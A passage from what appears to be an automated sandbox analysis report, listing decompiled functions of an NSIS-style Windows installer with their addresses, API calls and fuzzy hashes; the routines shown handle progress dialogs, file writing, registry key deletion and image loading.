														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








              0x004026e4
              0x004026e6
              0x004026e9
              0x004026eb
              0x004026ee
              0x004026f3
              0x004026f7
              0x004026fa
              0x004026fd
              0x00402bc2
              0x00402bc5
              0x00402703
              0x00402703
              0x0040270a
              0x0040270c
              0x0040270c
              0x00402712
              0x00402876
              0x00402876
              0x00402879
              0x0040287e
              0x004015b6
              0x00402925
              0x00402925
              0x00000000
              0x00402718
              0x00402719
              0x00402724
              0x00402727
              0x00402733
              0x00402737
              0x004027cf
              0x004027e7
              0x004027f7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040273d
              0x0040273d
              0x00402740
              0x00402741
              0x00402744
              0x00402749
              0x00402750
              0x00402758
              0x00000000
              0x0040275e
              0x0040275e
              0x00402763
              0x00000000
              0x00402769
              0x00402769
              0x00402771
              0x00402774
              0x00402777
              0x00402832
              0x00402839
              0x0040277d
              0x00402783
              0x0040278f
              0x004027f9
              0x004027f9
              0x00402791
              0x00402791
              0x00402794
              0x00402796
              0x00402796
              0x00402796
              0x00402799
              0x0040279e
              0x004027a1
              0x00000000
              0x00000000
              0x004027a3
              0x004027a6
              0x004027b4
              0x004027ba
              0x004027c8
              0x00000000
              0x004027ca
              0x00000000
              0x004027ca
              0x00000000
              0x004027c8
              0x00402796
              0x004027fc
              0x004027ff
              0x00000000
              0x00402801
              0x00402806
              0x00402847
              0x00402869
              0x00402870
              0x00402855
              0x00402855
              0x00402858
              0x0040285b
              0x0040285e
              0x0040285e
              0x00000000
              0x0040280f
              0x0040280f
              0x00402812
              0x00402815
              0x0040281b
              0x0040281f
              0x00402822
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00402822
              0x00402806
              0x004027ff
              0x00402777
              0x00402763
              0x00402758
              0x00000000
              0x00402824
              0x00402824
              0x00402827
              0x00402830
              0x00000000
              0x00402727
              0x00402712
              0x00402bcb
              0x00402bd1

              APIs
              • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$Pointer$ByteCharMultiWide$Read
              • String ID: 9
              • API String ID: 163830602-2366072709
              • Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
              • Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
              • Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
              • Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402FC6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402FC6(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				__eflags =  *0x420efc; // 0x0
				if(__eflags != 0) {
					return E0040696D(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a270;
				if(_t6 >  *0x42a270) {
					__eflags =  *0x42a268;
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F2B, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a334 & 0x00000001;
					if(( *0x42a334 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00402FAA());
						return E004055A4(0,  &_v132);
					}
				}
				return _t6;
			}







              0x00402fd5
              0x00402fd7
              0x00402fde
              0x00402fe1
              0x00402fe1
              0x00402fe7
              0x00000000
              0x00402fe7
              0x00402fef
              0x00402ff5
              0x00000000
              0x00402ff8
              0x00402fff
              0x00403005
              0x0040300b
              0x0040300d
              0x00403013
              0x00403051
              0x0040305a
              0x00000000
              0x0040305f
              0x00403015
              0x0040301c
              0x0040302d
              0x00000000
              0x0040303b
              0x0040301c
              0x00403067

              APIs
              • DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
              • GetTickCount.KERNEL32 ref: 00402FFF
              • wsprintfW.USER32 ref: 0040302D
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              • CreateDialogParamW.USER32 ref: 00403051
              • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                • Part of subcall function 00402FAA: MulDiv.KERNEL32(0002F5B0,00000064,00031437), ref: 00402FBF
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
              • String ID: ... %d%%
              • API String ID: 722711167-2449383134
              • Opcode ID: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
              • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
              • Opcode Fuzzy Hash: ab62b393791c357b2b7c3f13276244fc9b242bdab4121adb7888db3a09e72511
              • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404E4D, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404E4D(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














              0x00404e5b
              0x00404e68
              0x00404e6e
              0x00404eac
              0x00404eac
              0x00404ebb
              0x00404ec2
              0x00000000
              0x00404ec4
              0x00404e70
              0x00404e7f
              0x00404e87
              0x00404e8a
              0x00404e9c
              0x00404ea2
              0x00404ea9
              0x00000000
              0x00404ea9
              0x00000000

              APIs
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
              • GetMessagePos.USER32 ref: 00404E70
              • ScreenToClient.USER32 ref: 00404E8A
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402F2B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402F2B(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402FAA();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a274 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






              0x00402f3b
              0x00402f49
              0x00402f4f
              0x00402f4f
              0x00402f5d
              0x00402f5f
              0x00402f6b
              0x00402f70
              0x00402f72
              0x00402f72
              0x00402f7d
              0x00402f8d
              0x00402f9f
              0x00402f9f
              0x00402fa7

              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
              • wsprintfW.USER32 ref: 00402F7D
              • SetWindowTextW.USER32(?,?), ref: 00402F8D
              • SetDlgItemTextW.USER32 ref: 00402F9F
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: unpacking data: %d%%$verifying installer: %d%%
              • API String ID: 1451636040-1158693248
              • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
              • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
              • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
              • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402947, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E00402947(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x38)) = 0xfffffd66;
				_t50 = E00402D3E(0xfffffff0);
				 *(_t56 - 0x40) = _t23;
				if(E00405E88(_t50) == 0) {
					E00402D3E(0xffffffed);
				}
				E0040600D(_t50);
				_t26 = E00406032(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a278;
					 *(_t56 - 0x44) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403590(_t45);
						E0040357A(_t49,  *(_t56 - 0x44));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x28));
						 *(_t56 - 0x10) = _t54;
						if(_t54 != _t45) {
							E00403309(_t47,  *((intOrPtr*)(_t56 - 0x2c)), _t45, _t54,  *(_t56 - 0x28));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x3c) =  *_t54;
								E00405FED( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x3c);
							}
							GlobalFree( *(_t56 - 0x10));
						}
						E004060E4( *(_t56 + 8), _t49,  *(_t56 - 0x44));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x38)) = E00403309(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x38)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x40));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











              0x00402947
              0x00402949
              0x00402955
              0x00402958
              0x00402962
              0x00402966
              0x00402966
              0x0040296c
              0x00402979
              0x00402981
              0x00402984
              0x0040298a
              0x00402998
              0x0040299d
              0x004029a1
              0x004029a4
              0x004029ad
              0x004029b9
              0x004029bd
              0x004029c0
              0x004029ca
              0x004029e9
              0x004029d1
              0x004029d6
              0x004029de
              0x004029e1
              0x004029e6
              0x004029e6
              0x004029f0
              0x004029f0
              0x004029fd
              0x00402a03
              0x00402a15
              0x00402a15
              0x00402a1b
              0x00402a1b
              0x00402a26
              0x00402a27
              0x00402a2b
              0x00402a2f
              0x00402a35
              0x00402a35
              0x00402a3c
              0x004022e9
              0x00402bc5
              0x00402bd1

              APIs
              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
              • GlobalFree.KERNEL32 ref: 004029F0
              • GlobalFree.KERNEL32 ref: 00402A03
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Global$AllocFree$CloseDeleteFileHandle
              • String ID:
              • API String ID: 2667972263-0
              • Opcode ID: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
              • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
              • Opcode Fuzzy Hash: d96938230be506bb3ce62f46d8dc11094feca3525b7110c1e5131bc4c1b7a030
              • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404D3F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00404D3F(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406579(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406579(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406579(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















              0x00404d48
              0x00404d4d
              0x00404d55
              0x00404d56
              0x00404d63
              0x00404d6b
              0x00404d6c
              0x00404d6e
              0x00404d70
              0x00404d72
              0x00404d75
              0x00404d75
              0x00404d7c
              0x00404d82
              0x00404d82
              0x00404d89
              0x00404d90
              0x00404d93
              0x00404d96
              0x00404d96
              0x00404d9a
              0x00404daa
              0x00404dac
              0x00404daf
              0x00404d58
              0x00404d58
              0x00404d5f
              0x00404d5f
              0x00404db7
              0x00404dc2
              0x00404dd8
              0x00404de9
              0x00404e05

              APIs
              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
              • wsprintfW.USER32 ref: 00404DE9
              • SetDlgItemTextW.USER32 ref: 00404DFC
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s$H7B
              • API String ID: 3540041739-107966168
              • Opcode ID: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
              • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
              • Opcode Fuzzy Hash: f073c4526331e437099308c9ea4f4727a83fc85bc9477a72d0d5fe05f0d32628
              • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402E41, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
              Download Yara Rule
              C-Code - Quality: 48%
              			E00402E41(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063A9(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402E41(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406931(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












              0x00402e4c
              0x00402e55
              0x00402e5e
              0x00402e6a
              0x00402e73
              0x00402e7d
              0x00402ea2
              0x00402ea8
              0x00402ead
              0x00402eae
              0x00402ede
              0x00402eb7
              0x00402eb9
              0x00402f09
              0x00402f0c
              0x00000000
              0x00402f12
              0x00402ec8
              0x00402ecd
              0x00402ecf
              0x00000000
              0x00000000
              0x00402ed7
              0x00402edc
              0x00402edd
              0x00402edd
              0x00402eea
              0x00402ef2
              0x00402ef9
              0x00000000
              0x00402f22
              0x00000000
              0x00402f01
              0x00402e8d
              0x00402ea0
              0x00000000
              0x00000000
              0x00000000
              0x00402ea0
              0x00402f28

              APIs
              • RegEnumValueW.ADVAPI32 ref: 00402E95
              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseEnum$DeleteValue
              • String ID:
              • API String ID: 1354259210-0
              • Opcode ID: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
              • Instruction ID: 5acf5ff44325b65ef2d3dead3dbb76990f04c91a4d0d8f72c78c18ffef5b4167
              • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
              • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401D81, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D1C(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402D3E(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406483();
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











              0x00401d81
              0x00401d85
              0x00401d9a
              0x00401d87
              0x00401d89
              0x00401d8f
              0x00401d8f
              0x00401da0
              0x00401da3
